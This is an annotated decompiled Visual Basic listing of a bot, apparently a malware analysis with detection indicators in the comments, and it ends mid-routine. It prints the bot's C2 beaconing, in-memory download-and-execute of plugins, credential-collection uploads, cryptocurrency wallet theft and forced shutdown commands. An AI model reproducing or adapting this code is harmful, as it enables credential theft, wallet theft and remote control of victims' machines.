Dim var_A0 As Variant | |
Dim var_FC As String | |
Dim var_B0 As Variant | |
Dim var_128 As Boolean | |
loc_408F30: On Error Resume Next | |
' Split on "|": element 1 is the argument, element 0 the command id. | |
loc_408F6D: var_8C = Trim$(CStr(Split(params_str, "|", -1, 0)(1))) | |
loc_408F9E: var_90 = "|" & MY_DOMAIN & "|" & Me(128) & "|" | |
loc_408FAC: test_connection_microsoft() | |
loc_408FE2: command_id = Split(params_str, "|", -1, 0)(0) 'Variant | |
loc_408FFA: If (command_id = 0) Then | |
loc_409002: fingerprint_system(var_8C) | |
loc_40900A: Else | |
loc_409017: If (command_id = 1) Then | |
loc_409036: var_FC = 0 | |
' Download and execute in memory (Proc_0_25_4082A0), no file dropped. | |
loc_40904C: Proc_0_25_4082A0(process_data(var_8C, 0), "1") | |
loc_40905F: Else | |
loc_40906C: If (command_id = 2) Then | |
' Extension taken from the last three characters of the argument. | |
loc_409093: module_path = 0 & make_random_string(TEMP_DIR, Right$(var_8C, 3)) & Right$(var_8C, 3) | |
loc_4090B1: If process_and_write_to_file(var_8C, module_path) Then | |
loc_4090B9: shell_execute(module_path) | |
loc_4090BE: End If | |
loc_4090C1: Else | |
loc_4090CE: If (command_id = 3) Then | |
loc_4090E1: module_path = 0 & make_random_string(TEMP_DIR) | |
loc_40910D: If (LCase$(Right$(var_8C, 4)) = ".vbs") Then | |
loc_409119: module_path = module_path & ".vbs" | |
loc_40911F: Else | |
loc_40912A: module_path = module_path & ".exe" | |
loc_40912D: End If | |
loc_409141: If process_and_write_to_file(var_8C, module_path) Then | |
loc_409158: modify_bot_install(module_path, 0, &HFF) | |
loc_40915D: End If | |
loc_409162: Else | |
loc_40916F: If (command_id = 4) Then | |
loc_40917F: shell_execute("Explorer " & var_8C, &HFF) | |
loc_40918A: Else | |
loc_409197: If (command_id = 5) Then | |
loc_4091A3: var_B0 = CVar("iexplore " & var_8C) 'String | |
loc_4091A7: var_D0 = 0 | |
loc_4091AD: var_128 = True | |
loc_4091B6: Call MemVar_402104.Run | |
loc_4091C2: Else | |
loc_4091CF: If (command_id = 6) Then | |
loc_4091F2: Proc_0_29_4059BC(&HA, CStr(1) & var_90 & var_8C, var_128) | |
loc_409203: Else | |
loc_409210: If (command_id = 7) Then | |
loc_409233: Proc_0_29_4059BC(&HA, CStr(2) & var_90 & var_8C, var_D0) | |
loc_409244: Else | |
loc_409251: If (command_id = 8) Then | |
loc_409274: Proc_0_29_4059BC(&HA, CStr(3) & var_90 & var_8C) | |
loc_409285: Else | |
loc_409292: If (command_id = 9) Then | |
loc_4092AA: Proc_0_29_4059BC(6, 0) | |
loc_4092B5: Else | |
loc_4092C2: If (command_id = 10) Then | |
loc_4092CC: If UnknownFunc(var_B0) Then | |
loc_4092DB: If get_attribute1(OFF_C) Then | |
loc_4092EA: Kill OFF_C | |
loc_4092F2: Else | |
loc_409306: write_to_file(OFF_C, 0) | |
loc_40931A: Kill HOSTS_PATH | |
loc_40931F: End If | |
loc_409321: End If | |
loc_409326: Else | |
loc_409333: If (command_id = 11) Then | |
loc_409342: If get_attribute1(POS_PATH) Then | |
loc_409349: Me(168) = 0 | |
loc_409355: kill_task(POS_EXE) | |
loc_409366: Kill OUTPUT_TXT | |
loc_409377: Kill POS_PATH | |
loc_40937F: Else | |
loc_409385: Me(168) = &HFF | |
loc_40938A: End If | |
loc_40938F: Else | |
loc_40939C: If (command_id = 12) Then | |
loc_4093A1: Proc_0_31_4046A4(0) | |
loc_4093A9: Else | |
loc_4093B6: If (command_id = 13) Then | |
loc_4093FA: write_to_file(MY_DIR & "email.txt", process_data(MY_DOMAIN & "?u=" & "0", &HFF)) | |
loc_409417: Proc_0_29_4059BC(7, 0) | |
loc_409422: Else | |
loc_40942F: If (command_id = 14) Then | |
loc_40943F: Proc_0_29_4059BC(8, var_8C) | |
loc_409447: Else | |
loc_409454: If (command_id = 15) Then | |
loc_409464: Proc_0_29_4059BC(9, var_8C) | |
loc_40946C: Else | |
loc_409479: If (command_id = 16) Then | |
loc_409487: shutdown_or_reboot("1") | |
loc_409492: Else | |
loc_40949F: If (command_id = 17) Then | |
loc_4094AD: shutdown_or_reboot("0") | |
loc_4094B8: Else | |
loc_4094C5: If (command_id = 18) Then | |
' VB "End": terminates the process immediately. | |
loc_4094CA: End | |
loc_4094CF: Else | |
loc_4094D4: var_A0 = 19 | |
loc_4094DC: If (command_id = 19) Then | |
' Removes the VB settings branch "L!NK" (see fetch_logical_disks) and uninstalls. | |
loc_4094EC: DeleteSetting("L!NK", var_A0, var_D0) | |
loc_40950B: modify_bot_install("1", 0, &HFF) | |
loc_409516: Else | |
loc_409523: If (command_id = 20) Then | |
loc_40953F: Proc_0_29_4059BC(&HE, CStr(1) & var_90) | |
loc_40954E: Else | |
loc_40955B: If (command_id = 21) Then | |
loc_40957E: Proc_0_29_4059BC(&HE, CStr(2) & var_90 & var_8C) | |
loc_40958F: Else | |
loc_40959C: If (command_id = 22) Then | |
loc_4095BF: Proc_0_29_4059BC(&HE, CStr(3) & var_90 & var_8C) | |
loc_4095D0: Else | |
loc_4095DD: If (command_id = 23) Then | |
loc_4095ED: Proc_0_29_4059BC(&HF, var_90) | |
loc_4095F5: Else | |
loc_409602: If (command_id = 24) Then | |
loc_409617: Proc_0_29_4059BC(&HF, CStr(1)) | |
loc_409622: Else | |
loc_40962F: If (command_id = 25) Then | |
loc_409652: Proc_0_29_4059BC(&HE, CStr(4) & var_90 & var_8C) | |
loc_409663: Else | |
' Unknown command id: silently ignored. | |
loc_409667: Exit Sub | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_409668: End If | |
loc_40966C: Exit Sub | |
End Sub | |
Public Sub cnc_post_and_read | |
' Beacon: POSTs the fingerprint/registration body to the C2 and executes the reply. | |
' The request URL and header values are passed through hidden argument slots (var_98 | |
' is reused for "POST", "User-Agent", "Content-Type"); only the header names survive | |
' decompilation. The body comes from Proc_0_9_4040BC(Me(12), "application/x-www-form-urlencoded", | |
' ..., Me(128)); Me(12) is filled by fingerprint_system ("<3-char key>=<encoded data>"). | |
' Reply handling: abort unless StatusText = "OK" and the body contains no "<" (&H3C) - | |
' presumably a cheap filter against HTML error/landing pages. A body longer than 3 | |
' characters is base64-decoded and passed to parse_and_execute_commands. | |
' Network indicator: form-urlencoded POST whose single key is 3 lowercase characters | |
' derived from Me(124), followed by a base64 response with pipe-separated fields. | |
'Data Table: 401634 | |
Dim var_98 As Variant | |
Dim var_C8 As Boolean | |
Dim var_EC As Variant | |
loc_405520: On Error Resume Next | |
loc_40552A: Set conn_obj = MSXML_OBJ | |
loc_405530: var_98 = "POST" | |
loc_40553F: var_C8 = False | |
loc_405547: Call conn_obj.Open | |
loc_40554F: var_98 = "User-Agent" | |
loc_405561: Call conn_obj.SetRequestHeader | |
loc_405569: var_98 = "Content-Type" | |
loc_405578: Call conn_obj.SetRequestHeader | |
loc_40558E: var_EC = CVar(var_98 & Proc_0_9_4040BC(Me(12), "application/x-www-form-urlencoded", var_98, Me(128))) 'String | |
loc_405595: Call conn_obj.Send | |
loc_4055F3: If CBool((conn_obj.StatusText <> "OK") Or (InStr(1, conn_obj.ResponseText, CVar(ChrW$(&H3C)), 0) <> 0)) Then | |
loc_4055F8: Exit Sub | |
loc_4055F9: End If | |
loc_405612: If (Len(conn_obj.ResponseText) > 3) Then | |
loc_40562D: parse_and_execute_commands(base64_decode(CStr(conn_obj.ResponseText), conn_obj.ResponseText, var_C8), MY_DOMAIN) | |
loc_40563C: End If | |
loc_405640: Set conn_obj = Nothing | |
loc_405646: Exit Sub | |
End Sub | |
Public Sub Proc_0_29_4059BC(arg_C, arg_10) '4059BC | |
' Plugin loader: downloads MY_DOMAIN?p=<arg_C> and runs it in memory via Proc_0_25_4082A0. | |
' arg_C  - plugin id (also the "p" query value) | |
' arg_10 - command-line tail forwarded to the plugin | |
' arg_C = &HB is special-cased: the payload is hosted in SYSTEM32_DIR\wscript.exe rather | |
' than run with the "1" flag. For arg_C = 6 the routine then polls (up to 5 tries, 1 s | |
' apart - the GoTo pair forms the retry loop) for MY_DIR\ss.c, uploads it with | |
' post_content under a VOL_SERIAL-based name and deletes it. | |
' Indicators: wscript.exe spawned by this binary without a script argument; a short-lived | |
' "ss.c" file in MY_DIR followed by an outbound multipart upload. | |
'Data Table: 401634 | |
Dim var_98 As String | |
Dim var_8C As Long | |
loc_405854: On Error Resume Next | |
loc_405881: var_88 = process_data(MY_DOMAIN & "?p=" & CStr(arg_C), 0) | |
loc_405898: If (arg_C = &HB) Then | |
loc_4058AD: var_98 = MY_APPNAME & ".exe" & "|" | |
loc_4058CA: Proc_0_25_4082A0(var_88, SYSTEM32_DIR & "wscript.exe") | |
loc_4058DD: Else | |
loc_4058F8: If Proc_0_25_4082A0(var_88, "1", arg_10) Then | |
loc_405906: If (arg_C = 6) Then | |
' var_8C is the retry counter (0..4). | |
loc_405910: var_8C = 0 | |
loc_405925: ssc_file = MY_DIR & "ss" & ".c" | |
loc_40592B: ' Referenced from: 4059AD | |
loc_405936: If (var_8C <= 4) Then | |
loc_405943: If get_attribute1(ssc_file, var_8C) Then | |
loc_405973: If post_content(ssc_file, Proc_0_49_404F40(6, var_98 & Me(88))) Then | |
loc_405980: Kill ssc_file | |
loc_405985: End If | |
loc_405987: GoTo loc_4059B0 | |
loc_40598D: Else | |
' 1000 ms back-off between polls. | |
loc_405996: Sleep(&H3E8) | |
loc_4059A6: var_8C = (var_8C + 1) | |
loc_4059A9: End If | |
loc_4059AD: GoTo loc_40592B | |
loc_4059B0: ' Referenced from: 405987 | |
loc_4059B0: End If | |
loc_4059B0: End If | |
loc_4059B2: End If | |
loc_4059B4: End If | |
loc_4059B8: Exit Sub | |
End Sub | |
Public Sub Proc_0_30_4060D8 | |
' Credential-collection sweep: for plugin ids 0..5, downloads MY_DOMAIN?p=<index>, runs it | |
' in memory with the argument "/stext "<APPDATA_DIR><index>.c"" (a text-export switch; | |
' the exact tool is not identifiable from this listing), polls up to 5 times (1 s apart) | |
' for the output file, uploads it via post_content, then deletes it in a loop until it is | |
' gone. Finally runs steal_wallets and reports &HFF when that returned true. | |
' Index 2 sets var_92 = &HFF, which is forwarded to get_attribute1 - meaning unknown here. | |
' Indicators: files %APPDATA%\0.c .. 5.c created and removed within seconds, each | |
' followed by a multipart POST to MY_DOMAIN. | |
'Data Table: 401634 | |
Dim var_9C As Long | |
Dim var_92 As Integer | |
Dim var_86 As Integer | |
loc_405F48: On Error Resume Next | |
loc_405F5A: For index = 0 To 5: _index = index 'Long | |
loc_405F77: filename = APPDATA_DIR & CStr(_index) & ".c" | |
' var_9C is the per-module retry counter. | |
loc_405F88: var_9C = 0 | |
loc_405FB5: var_8C = process_data(MY_DOMAIN & "?p=" & CStr(_index), 0, &HFF) | |
loc_405FCC: If (_index = 2) Then | |
loc_405FD3: var_92 = &HFF | |
loc_405FD6: End If | |
loc_40600D: If Proc_0_25_4082A0(var_8C, "1", "/stext " & """" & filename & """") Then | |
loc_406010: ' Referenced from: 406079 | |
loc_40601B: If (var_9C <= 4) Then | |
loc_406028: If get_attribute1(filename, var_92) Then | |
' Upload name comes from Proc_0_49_404F40: VOL_SERIAL & "." & <letter for index>. | |
loc_406045: post_content(filename, Proc_0_49_404F40(_index, var_9C)) | |
loc_406053: GoTo loc_40607C | |
loc_406059: Else | |
loc_406062: Sleep(&H3E8) | |
loc_406072: var_9C = (var_9C + 1) | |
loc_406075: End If | |
loc_406079: GoTo loc_406010 | |
loc_40607C: ' Referenced from: 406053 | |
loc_40607C: End If | |
loc_40607C: End If | |
loc_406085: var_8C = 0 | |
loc_40608C: var_92 = 0 | |
loc_40608F: ' Referenced from: 4060B4 | |
' Delete loop: keeps trying until the output file no longer exists. | |
loc_406099: If get_attribute1(filename, var_92, var_9C) Then | |
loc_4060A6: Kill filename | |
loc_4060AD: DoEvents() | |
loc_4060B4: GoTo loc_40608F | |
loc_4060B7: End If | |
loc_4060BC: Next index 'Long | |
loc_4060C8: If steal_wallets() Then | |
loc_4060CF: var_86 = &HFF | |
loc_4060D2: End If | |
loc_4060D4: Result var_86 End Sub 'Integer | |
End Sub | |
Public Sub Proc_0_31_4046A4 | |
' Toggles an optional component (C2 command 12). | |
' If LOGNAME exists: stop "dwn.exe", wait 1 s, clear attributes on DWN_EXE and delete | |
' LOGNAME, KEYS_C, DWN_EXE and WIN_C (disable / clean up). | |
' Otherwise: download MY_DOMAIN?p=12 into LOGNAME and hand over to Proc_0_32_4051F0 | |
' (enable). The names LOGNAME / KEYS_C suggest a logging component, but its function is | |
' not visible in this listing. | |
' Indicators: a process named dwn.exe started from DWN_EXE with hidden+system attributes. | |
'Data Table: 401634 | |
loc_4045FE: If get_attribute1(LOGNAME) Then | |
loc_40460A: kill_task("dwn.exe") | |
loc_404617: Sleep(&H3E8) | |
' Attribute 0 = normal, so the file can be deleted. | |
loc_404626: SetAttr DWN_EXE, 0 | |
loc_404635: Kill LOGNAME | |
loc_404644: Kill KEYS_C | |
loc_404653: Kill DWN_EXE | |
loc_404662: Kill WIN_C | |
loc_40466A: Else | |
loc_40469A: If process_and_write_to_file(MY_DOMAIN & "?p=" & CStr(&HC), LOGNAME) Then | |
loc_40469D: Proc_0_32_4051F0(0) | |
loc_4046A2: End If | |
loc_4046A2: End If | |
loc_4046A2: Exit Sub | |
End Sub | |
Public Sub Proc_0_32_4051F0 | |
' Starts the component downloaded by Proc_0_31_4046A4. | |
' Decrypts the LOGNAME file, fetches MY_DOMAIN?u=2 and - if the reply is longer than 4 | |
' characters and contains a comma - stores it in WIN_C. Copies the bot (Me(88)) to DWN_EXE, | |
' marks it hidden+system (attribute 6 = 2 + 4) and runs the decrypted payload inside a | |
' process started from DWN_EXE via Proc_0_25_4082A0. | |
' Indicators: DWN_EXE hash identical to the main bot but running foreign code in memory. | |
'Data Table: 401634 | |
loc_4050E4: On Error Resume Next | |
loc_40510C: var_88 = decrypt(file_binary_open(LOGNAME)) | |
loc_405128: var_94 = MY_DOMAIN & "?u=" & CStr(2) | |
loc_40513E: Kill KEYS_C | |
loc_40514F: UnknownFunc(var_94) | |
loc_405173: var_90 = process_data(var_94, &HFF, 0) | |
loc_40519B: If ((Len(var_90) > 4) And (InStr(1, var_90, ",", 0) <> 0)) Then | |
loc_4051A8: write_to_file(WIN_C, var_90, StrConv(var_94, vbUnicode)) | |
loc_4051AD: End If | |
loc_4051B9: FileCopy Me(88), DWN_EXE | |
loc_4051CA: SetAttr DWN_EXE, 6 | |
loc_4051E4: Proc_0_25_4082A0(var_88, DWN_EXE, 0) | |
loc_4051EE: Exit Sub | |
End Sub | |
Public Sub steal_wallets | |
' Enumerates well-known cryptocurrency wallet folders under APPDATA_DIR and uploads every | |
' "*.wallet" file found via post_content. Always returns &HFF. | |
' Name table (indices 0..&H1B): entry 4 "-LTC" is combined with entry 2 ("Electrum-LTC"); | |
' entries above 8 get the suffix "coin" (Bitcoin, Litecoin, Namecoin, ...). | |
' Proc_0_14_403F14(path, ...) presumably tests whether the folder exists - inferred from use. | |
' Upload name: "<APPDATA>\<wallet>\*.wallet_<VOL_SERIAL>-<file>" (var_278 still holds the | |
' wildcard pattern, so the literal "*.wallet" ends up in the remote file name). | |
' Detection: a non-wallet process reading %APPDATA%\<wallet name>\*.wallet; consider | |
' file-access auditing on these directories. | |
'Data Table: 401634 | |
Dim var_2A0 As Variant | |
Dim var_290 As Variant | |
Dim var_278 As Variant | |
loc_407740: On Error Resume Next | |
loc_407752: ReDim _arr(0 To &H1B) | |
loc_407769: _arr(0) = "MultiBit" | |
loc_407778: _arr(1) = "Armory" | |
loc_407787: _arr(2) = "Electrum" | |
loc_407796: _arr(3) = "digital" | |
loc_4077A5: _arr(4) = "-LTC" | |
loc_4077B4: _arr(5) = "MultiDoge" | |
loc_4077C3: _arr(6) = "BitcoinDark" | |
loc_4077D2: _arr(7) = "Unobtanium" | |
loc_4077E1: _arr(8) = "Dash" | |
loc_4077F0: _arr(9) = "Bit" | |
loc_4077FF: _arr(&HA) = "Lite" | |
loc_40780E: _arr(&HB) = "Name" | |
loc_40781D: _arr(&HC) = "PP" | |
loc_40782C: _arr(&HD) = "Feather" | |
loc_40783B: _arr(&HE) = "Nova" | |
loc_40784A: _arr(&HF) = "Prime" | |
loc_407859: _arr(&H10) = "Terra" | |
loc_407868: _arr(&H11) = "Dev" | |
loc_407877: _arr(&H12) = "Anon" | |
loc_407886: _arr(&H13) = "Pay" | |
loc_407895: _arr(&H14) = "World" | |
loc_4078A4: _arr(&H15) = "Quark" | |
loc_4078B3: _arr(&H16) = "Infinite" | |
loc_4078C2: _arr(&H17) = "Doge" | |
loc_4078D1: _arr(&H18) = "Asic" | |
loc_4078E0: _arr(&H19) = "Lotto" | |
loc_4078EF: _arr(&H1A) = "Dark" | |
loc_4078FE: _arr(&H1B) = "Mona" | |
loc_407912: mArr = Array(_arr) 'Variant | |
loc_407923: CRefVarAry | |
loc_40792A: For index = 0 To UBound(mArr, 1): _index = index 'Long | |
' Special case: "Electrum" & "-LTC". | |
loc_40793B: If (_index = 4) Then | |
loc_407966: var_2A0 = mArr(2) & mArr(_index) | |
loc_40796E: VarIndexSt | |
loc_40797B: End If | |
' Entries 9.. are stems that receive the "coin" suffix. | |
loc_407986: If (_index > 8) Then | |
loc_4079A7: var_290 = mArr(_index) & "coin" | |
loc_4079AF: VarIndexSt | |
loc_4079BA: End If | |
loc_4079D4: var_290 = CVar(APPDATA_DIR) & mArr(_index) | |
loc_4079E2: var_8C = CStr(var_290 & "\") | |
loc_4079FD: If Proc_0_14_403F14(var_8C, 0, mArr, var_290, _index) Then | |
loc_407A0E: var_278 = CVar(var_8C & "*.wallet") 'String | |
loc_407A16: var_90 = Dir(var_278, 0) | |
loc_407A1C: ' Referenced from: 407AAB | |
' Dir() loop over all matching files; the GoTo pair is the loop. | |
loc_407A24: If CBool(Len(var_90)) Then | |
loc_407A7B: post_content(var_8C & var_90, CStr(var_278 & "_" & CVar(VOL_SERIAL) & "-" & CVar(var_90)), 0, mArr(_index)) | |
loc_407AA3: var_90 = Dir(var_278, 0) | |
loc_407AAB: GoTo loc_407A1C | |
loc_407AAE: End If | |
loc_407AAE: End If | |
loc_407AB5: Next index 'Long | |
loc_407AC3: Result &HFF End Sub 'Integer | |
End Sub | |
Public Sub process_data(arg_C, to_b64, to_encrypt) '40580C | |
' HTTP download helper used for plugins, modules and C2 data. | |
' arg_C      - URL (usually MY_DOMAIN & "?p=..." or "?u=...") | |
' to_b64     - when true and to_encrypt is false, the body is base64-decoded | |
' to_encrypt - when true, the body is run through decrypt() with a key derived by | |
'              Proc_0_19_404CD8 (decrypt's parameter list here is a decompiler artifact) | |
' Reads the response in &H1000-byte chunks into res_str until the read count var_9C is 0 | |
' or the masked read call (UnknownFunc) reports failure; the chunks are concatenated in | |
' var_8C. The network handle is obtained via two masked calls that take Me(128), so the | |
' transport API cannot be named from this listing. Result is returned in var_88. | |
' var_9C is not declared in this view; var_A4 is reused as a scratch buffer. | |
'Data Table: 401634 | |
Dim var_A8 As Long | |
Dim var_98 As Long | |
Dim var_BA As Integer | |
Dim var_92 As Integer | |
Dim var_A4 As String | |
loc_4056A4: On Error Resume Next | |
loc_405700: var_A4 = arg_C | |
loc_40570C: var_A8 = UnknownFunc(UnknownFunc(Me(128))) | |
loc_40571A: var_98 = var_A8 | |
' 4 KiB buffer pre-filled with "0". | |
loc_405739: res_str = String$(&H1000, CVar(Chr$(&H30))) | |
loc_405741: ' Referenced from: 4057A7 | |
loc_405750: var_A4 = res_str | |
loc_40575C: var_BA = UnknownFunc(var_98) | |
loc_40576D: var_92 = CBool(var_BA) | |
' Exit the read loop on zero bytes or a failed read. | |
loc_405783: If ((var_9C = 0) Or Not(var_92)) Then | |
loc_405788: GoTo loc_4057AA | |
loc_40578B: End If | |
loc_40579B: var_A4 = Left$(res_str, var_9C) | |
loc_40579F: var_8C = var_8C & var_A4 | |
loc_4057A7: GoTo loc_405741 | |
loc_4057AA: ' Referenced from: 405788 | |
loc_4057B6: If (Len(var_8C) <> 0) Then | |
loc_4057BE: If to_encrypt Then | |
loc_4057D7: var_88 = decrypt(var_8C, Proc_0_19_404CD8(var_8C, var_92, StrConv(res_str, vbUnicode), var_A4, var_BA, var_A4, Len(res_str)), var_9C, var_98, StrConv(arg_C, vbUnicode)) | |
loc_4057E0: Else | |
loc_4057E7: If to_b64 Then | |
loc_4057F4: var_88 = base64_decode(var_8C, var_A4, var_A8) | |
loc_4057FA: Else | |
loc_4057FF: var_88 = var_8C | |
loc_405802: End If | |
loc_405802: End If | |
loc_405804: End If | |
loc_405808: Exit Sub | |
End Sub | |
Public Sub file_binary_open(filename) '403E94 | |
' Reads a whole file in binary mode and returns its bytes as a string (var_88). | |
' Uses the fixed file number 1; with On Error Resume Next any failure (missing file, | |
' file number already open) yields an empty/unchanged result rather than an error. | |
' "Get 1, 0, ..." - record position 0 is not valid in VB6 (positions are 1-based); this | |
' is most likely how the decompiler renders an omitted position argument. | |
'Data Table: 401634 | |
loc_403E54: On Error Resume Next | |
loc_403E60: Open filename For Binary As 1 Len = &HFF | |
' Buffer sized to the file length. | |
loc_403E72: var_8C = Space$(LOF(1)) | |
loc_403E81: Get 1, 0, var_8C | |
loc_403E87: Close 1 | |
loc_403E8E: var_88 = var_8C | |
loc_403E93: Exit Sub | |
End Sub | |
Public Sub write_to_file(filename, content) '404158 | |
' Writes content to filename, overwriting it. | |
' Content shorter than &H400 bytes is written with Print # in text mode (which appends a | |
' line terminator); anything larger is written with a binary Put. Errors are swallowed. | |
' Used for dropped scripts (.cmd), downloaded modules and C2 data files. | |
'Data Table: 401634 | |
loc_4040F8: On Error Resume Next | |
loc_404107: If (Len(content) < &H400) Then | |
loc_404113: Open filename For Output As 1 Len = &HFF | |
loc_40411E: Print 1, content | |
loc_404128: Close 1 | |
loc_40412D: Else | |
loc_404138: Open filename For Binary As 1 Len = &HFF | |
loc_404148: Put 1, 0, content | |
loc_40414E: Close 1 | |
loc_404150: End If | |
loc_404154: Exit Sub | |
End Sub | |
Public Sub shell_execute(arg_C) '403C08 | |
' Runs a command line with VB Shell(), window style 0 (hidden). The returned task id | |
' is stored in var_9C and discarded. Callers pass extra arguments that the decompiler | |
' did not recover. | |
'Data Table: 401634 | |
Dim var_9C As Double | |
loc_403BE8: On Error Resume Next | |
loc_403BFF: var_9C = Shell(arg_C, 0) | |
loc_403C04: Exit Sub | |
End Sub | |
Public Sub shutdown_or_reboot(arg_C) '403E14 | |
' C2 commands 16/17: arg_C = "1" reboots ("-r"), anything else shuts down ("-s"), in both | |
' cases immediately (-t 0) and forcing applications closed (-f). | |
' Process-creation telemetry for "shutdown -t 0 -r -f" / "shutdown -t 0 -s -f" spawned by | |
' an unexpected parent is a simple detection hook. | |
'Data Table: 401634 | |
loc_403DE0: If (arg_C = "1") Then | |
loc_403DE6: var_88 = "r" | |
loc_403DEC: Else | |
loc_403DEF: var_88 = "s" | |
loc_403DF2: End If | |
loc_403E04: shell_execute("shutdown -t 0 -" & var_88 & " -f") | |
loc_403E10: Exit Sub | |
End Sub | |
Public Sub process_and_write_to_file(content, filename) '403DA8 | |
' Downloads `content` (a URL) with process_data and, if the download is non-empty, | |
' writes to `filename` and returns &HFF; otherwise returns 0 (var_86 default). | |
' NOTE(review): as decompiled, the write uses `content` (the URL) rather than the | |
' downloaded data in arg_C. This is either a decompiler variable-mapping artifact or a | |
' genuine bug in the sample; callers (parse_and_execute_commands, Proc_0_31_4046A4) | |
' clearly expect the downloaded module on disk. Confirm against the binary. | |
'Data Table: 401634 | |
Dim var_86 As Integer | |
loc_403D68: On Error Resume Next | |
loc_403D7D: arg_C = process_data(content, 0) | |
loc_403D8D: If (Len(arg_C) > 0) Then | |
loc_403D98: write_to_file(filename, content) | |
loc_403DA1: var_86 = &HFF | |
loc_403DA4: End If | |
loc_403DA6: Result var_86 End Sub 'Integer | |
End Sub | |
Public Sub Proc_0_40_40628C(arg_C, arg_10) '40628C | |
' Locates a PE section of the running module by name and copies it out. | |
' arg_C - section name; truncated to 8 characters (the PE section-name limit). | |
' Walks the in-memory image at App.hInstance: MZ check (23117 = &H5A4D), PE signature | |
' (&H4550), then iterates section headers (&H28 bytes apart) comparing the name prefix | |
' with Left$(...) and CopyMemory-ing the matching section's raw bytes into a zero-filled | |
' string. Several locals (var_90, var_D0, var_DE, var_100, var_104, arg_109) are header | |
' fields whose assignment the decompiler dropped. | |
' Inferred purpose: reading an embedded configuration/payload blob stored in a dedicated | |
' section of the dropper - plausible but not proven by this listing. | |
'Data Table: 401634 | |
Dim MemVar_40B3A4 As Global | |
Dim var_118 As Long | |
Dim var_11C As Long | |
Dim var_15C As String | |
loc_406130: If (Len(arg_C) > 8) Then | |
loc_406140: var_8C = Left$(var_8C, 8) | |
loc_406143: End If | |
loc_40614F: var_124 = MemVar_40B3A4.App | |
' Base address of the current module. | |
loc_40615F: var_118 = App.hInstance | |
loc_40616A: If CBool(var_118) Then | |
loc_406178: CopyMemory(var_CC, var_118, &H40) | |
loc_406185: If (var_CC = 23117) Then | |
loc_406197: CopyMemory(var_E4, (var_118 + var_90), &H18) | |
loc_4061A6: If (var_E4 = &H4550) Then | |
loc_4061CD: For var_130 = 0 To CLng((var_DE - 1)): var_120 = var_130 'Long | |
loc_4061E7: CopyMemory(Record Of arg_109, var_114, (((var_118 + var_90) + &H18) + CLng(var_D0))) | |
loc_406200: var_15C = arg_109 | |
loc_406211: var_114 = var_15C | |
' Prefix match on the section name. | |
loc_406223: If (Left$(var_15C, Len(var_8C)) = var_8C) Then | |
loc_406260: CopyMemory(CStr(String(var_104, CVar(Chr$(0)))), (var_118 + var_100), var_104) | |
loc_406271: Exit For | |
loc_406274: End If | |
' Advance to the next IMAGE_SECTION_HEADER (&H28 bytes). | |
loc_40627D: var_11C = (var_11C + &H28) | |
loc_406283: Next var_130 'Long | |
loc_406288: ' Referenced from: 406271 | |
loc_406288: End If | |
loc_406288: End If | |
loc_406288: End If | |
loc_406288: Exit Sub | |
End Sub | |
Public Sub modify_bot_install(arg_C, copy_bot, arg_14, kill_bot) '4076EC | |
' Update / uninstall routine; always ends with VB "End" (process terminates). | |
' arg_C    - path of a replacement binary to "start" after cleanup ("1" = none) | |
' copy_bot - copy self to MY_APPNAME, launch it, and exit unless Me(162) | |
' arg_14   - when true, remove the whole MY_DIR tree ("rd /q /s \\.\<MY_DIR>") instead of | |
'            deleting only the bot file Me(88) | |
' kill_bot - stop companion processes, delete dropped files, restore task manager / | |
'            regedit (disable_tskmgr_regtools with "0" - inferred from the name), remove | |
'            the three HKCU autostart values and end the scheduled task | |
' The actual deletion is delegated to a self-deleting batch file in TEMP_DIR: | |
'   ping -n 4 127.0.0.1 > nul     (≈3 s delay so this process can exit) | |
'   rd /q /s "\\.\<MY_DIR>"  or  del /F "<Me(88)>" | |
'   [start <arg_C>] | |
'   del /F "<the .cmd itself>" | |
' Indicators: a random 8-hex-character .cmd in %TEMP% with this shape; schtasks /end; | |
' RegDelete of Run/RunOnce/Policies\Explorer\Run\<MY_APPNAME>. | |
'Data Table: 401634 | |
Dim var_A0 As Variant | |
Dim var_B4 As String | |
Dim var_D0 As Integer | |
Dim var_F0 As Boolean | |
loc_407404: On Error Resume Next | |
loc_40740C: If copy_bot Then | |
loc_40741B: FileCopy Me(88), MY_APPNAME | |
loc_407427: shell_execute(MY_APPNAME) | |
loc_407434: If Not(Me(162)) Then | |
loc_407439: Exit Sub | |
loc_40743A: End If | |
loc_40743A: End If | |
loc_407441: If kill_bot Then | |
loc_40744F: kill_task("dwn.exe") | |
loc_407462: kill_task("wscript.exe") | |
loc_407471: kill_task(POS_EXE) | |
loc_40748D: Kill CVar(Me(40) & MY_APPNAME & ".exe") | |
loc_4074A4: Kill HOSTS_PATH | |
loc_4074B5: Kill OUTPUT_TXT | |
loc_4074C6: Kill POS_PATH | |
loc_4074D0: var_B4 = "0" | |
loc_4074DF: disable_tskmgr_regtools("0") | |
loc_4074FF: disable_tskmgr_regtools("1", "0") | |
loc_407512: Set _wscript = WSCRIPT_OBJ | |
' Undo the persistence written by make_persistent. | |
loc_407521: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\" & MY_APPNAME) 'String | |
loc_407528: Call _wscript.RegDelete | |
loc_40753C: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\run\" & MY_APPNAME) 'String | |
loc_407543: Call _wscript.RegDelete | |
loc_407557: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & MY_APPNAME) 'String | |
loc_40755E: Call _wscript.RegDelete | |
loc_40758E: var_A0 = CVar("schtasks /" & "end /tn " & """" & MY_APPNAME & ".exe" & """") 'String | |
loc_407592: var_D0 = 0 | |
loc_407598: var_F0 = False | |
loc_4075A0: Call _wscript.Run | |
loc_4075B8: Set _wscript = Nothing | |
loc_4075BC: End If | |
' Random .cmd name in TEMP_DIR (make_random_string -> 8 hex chars). | |
loc_4075D5: filename = var_A0 & make_random_string(TEMP_DIR, var_F0, var_D0, var_A0) & ".cmd" | |
loc_4075EF: If ((Len(arg_C) > 1) Or arg_14) Then | |
